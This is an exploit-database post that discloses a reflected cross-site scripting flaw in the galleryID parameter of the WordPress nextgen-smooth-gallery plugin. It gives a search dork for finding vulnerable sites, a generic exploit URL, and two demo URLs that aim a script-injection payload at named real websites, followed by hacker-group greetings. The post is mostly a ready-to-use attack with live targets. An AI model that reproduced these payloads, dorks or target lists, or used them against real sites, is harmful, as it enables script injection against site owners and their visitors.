Wordpress nextgen-smooth-gallery Plugin Xss vulnerabilities
2013-09-03 14:06:32Posted by: irist.ir
###################
# Iranian Exploit DataBase Forum
# http://iedb.ir/acc
# http://iedb.ir
###################
# Exploit Title : Wordpress nextgen-smooth-gallery Plugin Xss vulnerabilities
# Author : Iranian Exploit DataBase
# Discovered By : IeDb
# Email : [email protected]
# Home : http://iedb.ir - http://iedb.ir/acc
# Software Link : http://wordpress.org/
# Security Risk : High
# Tested on : Linux
# Dork : inurl:/plugins/nextgen-smooth-gallery/
###################
# Exploit :
# http://site.com/wp-content/plugins/nextgen-smooth-gallery/nggSmoothFrame.php?galleryID=[Xss]
# Dem0 :
# http://www.thetailor.com.au/wp-content/plugins/nextgen-smooth-gallery/nggSmoothFrame.php?galleryID=187"><script>alert(/IeDb.Ir/)</script>
# http://www.4castsecurity.com/wp-content/plugins/nextgen-smooth-gallery/nggSmoothFrame.php?galleryID=2"><script>alert(/IeDb.Ir/)</script>
###################
# Tnx To : TaK.FaNaR - l4tr0d3ctism - r3d_s0urc3 - Bl4ck M4n - FαÑ�iD - Medrik - Dj.TiniVini - dr.koderz - z3r0 - Mr Zer0
# B3hz4d - C0dex - Behnam Vanda - ErfanMs - E2MA3N - S!Y0U.T4r.6T - ßÄ¿4Ä�Ò� Ħ3Ä¿Ä¿ - 0x0ptim0us - ARTA
# & All Member In Iedb.ir/acc & Iranian Hackers
###################
# Exploit Archive = http://www.iedb.ir/exploits-484.html
###################
Fixes
No fixesIn order to submit a new fix you need to be registered.